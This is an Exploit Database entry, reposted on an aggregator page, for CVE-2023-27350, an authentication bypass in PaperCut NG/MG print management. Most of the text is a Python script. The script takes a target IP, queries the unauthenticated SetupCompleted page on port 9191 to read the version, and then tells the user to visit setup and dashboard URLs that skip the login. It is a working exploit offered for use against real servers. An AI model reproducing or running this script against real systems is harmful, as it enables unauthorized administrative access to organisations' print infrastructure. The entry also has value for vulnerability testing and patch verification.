PaperCut NG/MG 22.0.4 – Authentication Bypass

• Exploit Database
• 42 阅读

• 作者： MaanVader
  日期： 2023-04-25
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51391/

• # Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass
  # Date: 21 April 2023
  # Exploit Author: MaanVader
  # Vendor Homepage: https://www.papercut.com/
  # Version: 8.0 or later
  # Tested on: 22.0.4
  # CVE: CVE-2023-27350
  
  import requests
  from bs4 import BeautifulSoup
  import re
  
  def vuln_version():
  ip = input("Enter the ip address: ")
  url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted"
  response = requests.get(url)
  soup = BeautifulSoup(response.text, 'html.parser')
  text_div = soup.find('div', class_='text')
  product_span = text_div.find('span', class_='product')
  
  # Search for the first span element containing a version number
  version_span = None
  for span in text_div.find_all('span'):
  version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
  if version_match:
  version_span = span
  break
  
  if version_span is None:
  print('Not Vulnerable')
  else:
  version_str = version_span.text.strip()
  print('Version:', version_str)
  print("Vulnerable version")
  print(f"Step 1 visit this url first in your browser: {url}")
  print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")
  
  
  if __name__ =="__main__":
  vuln_version()